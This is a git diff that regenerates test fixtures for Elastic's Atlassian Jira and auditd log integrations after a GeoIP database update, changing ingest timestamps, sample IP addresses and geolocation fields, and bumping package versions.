@@ -5725,7 +5722,7 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-08T14:50:53.782729478Z", + "ingested": "2021-12-15T09:00:47.652730035Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"jira.auditing.project.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"test\"},{\"i18nKey\":\"common.words.key\",\"key\":\"Key\",\"to\":\"TEST\"},{\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\",\"to\":\"\"},{\"i18nKey\":\"common.concepts.projectlead\",\"key\":\"Project Lead\",\"to\":\"test.user\"},{\"i18nKey\":\"admin.projects.default.assignee\",\"key\":\"Default Assignee\",\"to\":\"Unassigned\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":297000000},\"version\":\"1.0\"}", "type": [ "creation" 
@@ -5819,7 +5816,7 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-08T14:50:53.782731825Z", + "ingested": "2021-12-15T09:00:47.652730957Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project roles changed\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.common.words.users\",\"key\":\"Users\",\"to\":\"JIRAUSER10000\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":506000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5889,7 +5886,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:53.782734154Z", + "ingested": "2021-12-15T09:00:47.652731834Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 1.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-14\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":521000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5952,7 +5949,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { 
@@ -5960,27 +5957,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-08T14:50:53.782736517Z", - "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version released\",\"actionI18nKey\":\"jira.auditing.version.released\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":535000000},\"version\":\"1.0\"}", + "ingested": "2021-12-15T09:00:47.652732773Z", + "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Version 1.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version 
released\",\"actionI18nKey\":\"jira.auditing.version.released\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" }, @@ -6042,7 +6036,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:53.782738864Z", + "ingested": "2021-12-15T09:00:47.652733650Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Version 2.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 2.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-28\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":543000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6117,7 +6111,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:53.782741212Z", + "ingested": "2021-12-15T09:00:47.652734522Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Version 3.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 3.0\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":545000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6187,7 +6181,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:53.782743559Z", + "ingested": "2021-12-15T09:00:47.652735399Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"85\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 85\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539922,\"nano\":856000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -6258,7 +6252,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-08T14:50:53.782745939Z", + "ingested": "2021-12-15T09:00:47.652736274Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"jira.auditing.user.login.failed\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Current number of failed login attempts\",\"nameI18nKey\":\"jira.auditing.user.login.failed.count\",\"value\":\"2\"},{\"name\":\"Reason for failed login\",\"nameI18nKey\":\"jira.auditing.user.login.failed.reason\",\"value\":\"User couldn't be authenticated\"}],\"method\":\"Browser\",\"source\":\"172.17.0.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955310,\"nano\":718000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.login.failed", @@ -6334,7 +6328,7 @@ "ip": "10.100.100.2" }, "event": { - "ingested": "2021-12-08T14:50:53.782748287Z", + "ingested": "2021-12-15T09:00:47.652737145Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login successful\",\"actionI18nKey\":\"jira.auditing.user.logged.in\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=admin.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955209,\"nano\":363000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.logged.in", 
diff --git a/packages/atlassian_jira/manifest.yml b/packages/atlassian_jira/manifest.yml index 27ab2b7cf0f..87408498acb 100644 --- a/packages/atlassian_jira/manifest.yml +++ b/packages/atlassian_jira/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_jira title: Atlassian Jira -version: 1.0.0 +version: 1.0.1 license: basic description: Collect logs from Atlassian Jira with Elastic Agent. type: integration diff --git a/packages/auditd/changelog.yml b/packages/auditd/changelog.yml index d3bbba765b5..3486e3e109a 100644 --- a/packages/auditd/changelog.yml +++ b/packages/auditd/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.0" changes: - description: Change test IPs to the supported set for GeoIP diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json index e18aa2fc026..6e1d5056c15 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json @@ -14,7 +14,7 @@ }, "event": { "action": "mac_ipsec_event", - "ingested": "2021-12-02T11:18:11.329098600Z", + "ingested": "2021-12-14T14:35:17.193775882Z", "original": "type=MAC_IPSEC_EVENT msg=audit(1485893834.891:18877201): op=SPD-delete auid=4294967295 ses=4294967295 res=1 src=192.168.2.0 src_prefixlen=24 dst=192.168.0.0 dst_prefixlen=16", "kind": "event", "outcome": "1" 
@@ -54,7 +54,7 @@ }, "event": { "action": "syscall", - "ingested": "2021-12-02T11:18:11.329123900Z", + "ingested": "2021-12-14T14:35:17.193778358Z", "original": "type=SYSCALL msg=audit(1485893834.891:18877199): arch=c000003e syscall=44 success=yes exit=184 a0=9 items=0 ppid=1240 pid=1281 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"charon\" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)", "category": [ "process" @@ -125,7 +125,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329134900Z", + "ingested": "2021-12-14T14:35:17.193778802Z", "original": "type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd=\"/\" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'", "kind": "event", "action": [ @@ -168,14 +168,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -188,7 +188,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329142300Z", + "ingested": "2021-12-14T14:35:17.193779203Z", "original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe=\"/usr/sbin/sshd\" hostname=? addr=89.160.20.156 terminal=? res=success'", "kind": "event", "action": [ 
@@ -245,7 +245,7 @@ "action": [ "typed" ], - "ingested": "2021-12-02T11:18:11.329149700Z", + "ingested": "2021-12-14T14:35:17.193779627Z", "original": "type=TTY msg=audit(1491924063.550:1065565): tty pid=27930 uid=1000 auid=1000 ses=762 major=136 minor=0 comm=\"bash\" data=65687F7F6563686F20746573740D76696D202F6574632F70616D2E642F70617373776F72642D617574682D61630D6D616E2070616D5F7474795F61756469740D6D616E2070616D2E640D76696D202F657463017375646F20052F70616D642E73797F7F7F7F7F2E7F6D2E642F7379092D6109617F2D61090D6D616E2070616D0D747F67726570207379737F7F7F2F7661722F6C6F09672F6D65097309207C20677265702070616D5F7474790D677265702070616D5F747479202F7661722F6C6F672F6D6573090D1B5B41017375646F200D7375646F2073750D", "kind": "event" }, @@ -276,7 +276,7 @@ }, "event": { "action": "proctitle", - "ingested": "2021-12-02T11:18:11.329156Z", + "ingested": "2021-12-14T14:35:17.193780007Z", "original": "type=PROCTITLE msg=audit(1451781471.394:194438): proctitle=\"bash\"", "kind": "event" }, @@ -297,7 +297,7 @@ }, "event": { "action": "proctitle", - "ingested": "2021-12-02T11:18:11.329162400Z", + "ingested": "2021-12-14T14:35:17.193780397Z", "original": "type=PROCTITLE msg=audit(1451781471.394:194440): proctitle=737368643A206275726E205B707269765D", "kind": "event" }, @@ -322,7 +322,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329168800Z", + "ingested": "2021-12-14T14:35:17.193780783Z", "original": "type=SOFTWARE_UPDATE msg=audit(1573844484.309:785): pid=3157 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='sw=\"gcc-4.8.5-39.el7.x86_64\" sw_type=rpm key_enforce=0 gpg_res=1 root_dir=\"/\" comm=\"yum\" exe=\"/usr/bin/python2.7\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ 
@@ -370,7 +370,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329195Z", + "ingested": "2021-12-14T14:35:17.193781159Z", "original": "type=SYSTEM_BOOT msg=audit(1573844456.144:5): pid=678 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -409,7 +409,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329200700Z", + "ingested": "2021-12-14T14:35:17.193781560Z", "original": "type=SYSTEM_SHUTDOWN msg=audit(1573844517.054:1163): pid=4440 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -447,7 +447,7 @@ }, "event": { "action": "execve", - "ingested": "2021-12-02T11:18:11.329208400Z", + "ingested": "2021-12-14T14:35:17.193781948Z", "original": "type=EXECVE msg=audit(1581371984.206:579393): argc=1 a0=top", "kind": "event" }, @@ -470,7 +470,7 @@ "action": [ "loaded-kernel-module" ], - "ingested": "2021-12-02T11:18:11.329216Z", + "ingested": "2021-12-14T14:35:17.193782510Z", "original": "type=KERN_MODULE msg=audit(1581371984.206:579397): name=mymodule", "category": [ "driver" @@ -501,7 +501,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329229200Z", + "ingested": "2021-12-14T14:35:17.193782910Z", "original": "type=VIRT_CONTROL msg=audit(1513507481.075:145): pid=1431 uid=0 auid=100 ses=3 subj=system_u:system_r:container_runtime_t:s0 msg='user=root reason=api op=create vm=? vm-pid=? hostname=? exe=\"/usr/bin/dockerd-current\" addr=? terminal=? res=success'", "kind": "event", "action": [ 
@@ -546,7 +546,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329289Z", + "ingested": "2021-12-14T14:35:17.193783354Z", "original": "type=VIRT_MACHINE_ID msg=audit(1481903143.572:23118): pid=5637 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:virtd_t:s0-s0:c0.c1023 msg='virt=kvm vm=\"rhel-work3\" uuid=5501263b-181d-47ed-ab03-a6066f3d26bf vm-ctx=system_u:system_r:svirt_t:s0:c444,c977 img-ctx=system_u:object_r:svirt_image_t:s0:c444,c977 model=selinux exe=\"/usr/sbin/libvirtd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -589,7 +589,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329294500Z", + "ingested": "2021-12-14T14:35:17.193783740Z", "original": "node=localhost.localdomain type=DAEMON_START msg=audit(1594053514.588:4686): op=start ver=2.8.5 format=raw kernel=3.10.0-1062.9.1.el7.x86_64 auid=4294967295 pid=1643 uid=0 ses=4294967295 subj=system_u:system_r:auditd_t:s0 res=success", "kind": "event", "action": [ @@ -632,7 +632,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329302400Z", + "ingested": "2021-12-14T14:35:17.193784129Z", "original": "node=localhost.localdomain type=CONFIG_CHANGE msg=audit(1594053514.707:5): audit_failure=1 old=1 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 res=1", "kind": "event", "action": [ @@ -678,7 +678,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329309800Z", + "ingested": "2021-12-14T14:35:17.193784632Z", "original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.709:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ 
@@ -723,7 +723,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329316600Z", + "ingested": "2021-12-14T14:35:17.193785020Z", "original": "node=localhost.localdomain type=SYSTEM_BOOT msg=audit(1594053514.725:7): pid=1667 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -762,7 +762,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329321800Z", + "ingested": "2021-12-14T14:35:17.193785405Z", "original": "type=USER_END msg=audit(1489519230.178:19600327): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:session_close acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -809,7 +809,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329331Z", + "ingested": "2021-12-14T14:35:17.193785791Z", "original": "type=CRED_DISP msg=audit(1489519230.178:19600328): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -856,7 +856,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329343200Z", + "ingested": "2021-12-14T14:35:17.193786175Z", "original": "type=CRED_ACQ msg=audit(1489519256.193:19600330): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ 
@@ -903,7 +903,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329354300Z", + "ingested": "2021-12-14T14:35:17.193786552Z", "original": "type=USER_START msg=audit(1489519256.193:19600331): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:session_open acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -952,7 +952,7 @@ "action": [ "changed-login-id-to" ], - "ingested": "2021-12-02T11:18:11.329365200Z", + "ingested": "2021-12-14T14:35:17.193786927Z", "original": "type=LOGIN msg=audit(1489636960.072:19623791): pid=28281 uid=0 old auid=700 new auid=700 old ses=6793 new ses=12286", "category": [ "authentication" @@ -995,14 +995,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1015,7 +1015,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329376100Z", + "ingested": "2021-12-14T14:35:17.193787432Z", "original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=89.160.20.156 lport=50022 exe=\"/usr/sbin/sshd\" hostname=? addr=89.160.20.156 terminal=? res=success'", "kind": "event", "action": [ @@ -1068,14 +1068,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1088,7 +1088,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329383400Z", + "ingested": "2021-12-14T14:35:17.193787815Z", "original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=89.160.20.156 terminal=ssh res=success'", "kind": "event", "action": [ @@ -1136,7 +1136,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329391800Z", + "ingested": "2021-12-14T14:35:17.193788223Z", "original": "type=USER_ACCT msg=audit(1489636977.805:19623808): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:accounting acct=\"root\" exe=\"/bin/su\" hostname=? addr=? terminal=pts/0 res=success'", "kind": "event", "action": [ @@ -1185,7 +1185,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329403100Z", + "ingested": "2021-12-14T14:35:17.193788610Z", "original": "type=SERVICE_START msg=audit(1481076983.864:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1229,7 +1229,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329413800Z", + "ingested": "2021-12-14T14:35:17.193788998Z", "original": "type=SERVICE_STOP msg=audit(1481076984.534:16): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1271,7 +1271,7 @@ "action": [ "loaded-firewall-rule-to" ], - "ingested": "2021-12-02T11:18:11.329424900Z", + "ingested": "2021-12-14T14:35:17.193789391Z", "original": "type=NETFILTER_CFG msg=audit(1481076984.827:17): table=filter family=2 entries=0", "category": [ "configuration" 
@@ -1304,7 +1304,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329435900Z", + "ingested": "2021-12-14T14:35:17.193789780Z", "original": "type=ADD_GROUP msg=audit(1481076992.414:385): pid=1235 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-group id=1000 exe=\"/usr/sbin/groupadd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1356,7 +1356,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329442500Z", + "ingested": "2021-12-14T14:35:17.193790174Z", "original": "type=GRP_MGMT msg=audit(1481076992.419:386): pid=1235 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-shadow-group id=1000 exe=\"/usr/sbin/groupadd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1408,7 +1408,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329450500Z", + "ingested": "2021-12-14T14:35:17.193790564Z", "original": "type=ADD_USER msg=audit(1481076992.488:389): pid=1264 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-user id=1000 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1461,7 +1461,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329462800Z", + "ingested": "2021-12-14T14:35:17.193790954Z", "original": "type=SYSTEM_RUNLEVEL msg=audit(1481076992.492:390): pid=1279 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='old-level=N new-level=3 comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ 
